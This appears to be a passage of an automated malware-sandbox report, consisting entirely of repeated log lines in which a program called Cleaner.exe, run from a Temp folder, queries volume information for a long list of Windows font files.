                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
